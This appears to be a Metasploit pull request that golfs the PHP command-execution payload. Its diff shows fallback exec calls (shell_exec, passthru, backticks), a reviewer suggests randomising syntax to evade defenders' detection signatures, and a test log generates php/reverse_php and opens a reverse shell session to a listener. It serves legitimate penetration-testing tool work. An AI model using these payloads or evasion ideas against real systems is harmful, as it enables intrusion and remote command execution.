### PR TITLE
Golf a bit the php payload

### PR DESCRIPTION
**Pull request by jvoisin**
- Put all the error-disabling statements on a single line
- Remove some useless spaces
- Use `stristr(…)` (available since PHP4) instead of `strpos(strtolower(…))`
- Use `&&` instead of `and`
- Use backticks instead of `passthru`, since they're equivalent: https://www.php.net/manual/en/language.operators.execution.php

### CODE REVIEW

**Comment by jmartin-r7** [comment]
> Use stristr(…) (available since PHP4) instead of strpos(strtolower(…))

Do we still want to support things older than PHP?

File: lib/msf/core/payload/php.rb [hunk 1]
```diff
@@ -70,38 +69,38 @@ def php_system_block(options = {})
...
-      if(#{is_callable}('shell_exec')and!#{in_array}('shell_exec',#{dis})){
+      if(#{is_callable}('shell_exec')&&!#{in_array}('shell_exec',#{dis})){
         #{output}=shell_exec(#{cmd});
       }else"
     passthru = "
-      if(#{is_callable}('passthru')and!#{in_array}('passthru',#{dis})){
+      if(#{is_callable}('passthru')&&!#{in_array}('passthru',#{dis})){
         ob_start();
-        passthru(#{cmd});
+        `#{cmd}`;
```
Comment (jmartin-r7) [inline lib/msf/core/payload/php.rb:85]: This should stay, per the linked php doc using backtic would end up calling `shell_exec` which was what the test above was looking for.

```suggestion
        passthru(#{cmd});
```

**Comment by sempervictus** [comment]
@jvoisin - IIRC we have something in `rex-powershell` for dealing with old version compatibility in the conventions of at least the CLI invocation if not some of the function calls. Also, if the defenders are looking for a payload with 4 `and`s and we change that up to 4 `&&`s then they will simply create a detection signature variant... might be better to randomize what's used and where (or even better - randomize by default, give users knobs to tweak how they want generation done in the advanced options).

**Comment by adfoster-r7** [comment]
Verified working with php 5.3 and python 8.2 - and statically looking at the code everything seems well :+1:

```
msf6 payload(php/reverse_php) > generate -f raw lhost=127.0.0.1 
msf6 payload(php/reverse_php) > to_handler lhost=192.168.123.1
...
[*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.135:49779) at 2023-06-12 16:25:17 +0100
...
```

**Comment by adfoster-r7** [comment]
## Release Notes

Reduces the size of PHP payloads such as `php/reverse_php`

**Pull request merged**